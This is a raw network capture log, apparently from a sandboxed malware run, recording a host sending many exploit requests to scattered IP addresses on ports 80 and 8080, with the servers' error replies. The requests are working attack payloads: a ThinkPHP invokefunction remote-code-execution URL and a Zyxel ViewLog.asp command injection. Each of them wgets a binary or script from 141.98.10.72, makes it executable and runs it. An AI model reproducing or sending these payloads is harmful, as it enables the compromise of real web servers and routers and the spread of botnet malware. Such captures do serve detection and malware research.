Feb 14, 2024 09:30:06.605735064 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:06.890832901 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:30:06.890868902 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
513	192.168.2.15	39936	95.181.228.164	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:06.794584036 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:07.165060997 CET	932	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Wed, 14 Feb 2024 08:30:07 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
514	192.168.2.15	50718	95.128.42.202	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:06.815896988 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
515	192.168.2.15	57766	31.136.37.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.232068062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:11.353493929 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:17.496807098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:29.528381109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.591898918 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:42.742396116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
516	192.168.2.15	41262	94.177.134.119	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.232949018 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:08.434778929 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.9 Mime-Version: 1.0 Date: Tue, 06 Apr 2021 05:25:25 GMT Content-Type: text/html Content-Length: 3161 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff;

Session ID	Source IP	Source Port	Destination IP	Destination Port
517	192.168.2.15	48496	85.122.221.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.236309052 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
518	192.168.2.15	53928	94.121.185.253	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.277103901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
519	192.168.2.15	54780	94.120.37.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.278760910 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
520	192.168.2.15	41164	94.121.155.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.278856993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
521	192.168.2.15	57026	62.29.126.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.279266119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
522	192.168.2.15	34772	95.86.113.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.284581900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
523	192.168.2.15	42514	88.221.230.144	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.380687952 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:08.594878912 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:08 GMT Date: Wed, 14 Feb 2024 08:30:08 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 36 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 38 26 23 34 36 3b 32 37 62 37 31 34 33 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.669b1702.1707899408.27b7143d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
524	192.168.2.15	42840	88.147.150.44	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.412745953 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:08.655389071 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 14 Feb 2024 08:30:01 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
525	192.168.2.15	38056	94.111.59.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.488904953 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
526	192.168.2.15	40278	94.120.161.171	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.526992083 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
527	192.168.2.15	32960	112.213.32.238	80

Timestamp	Bytes transferred	Direction	Data
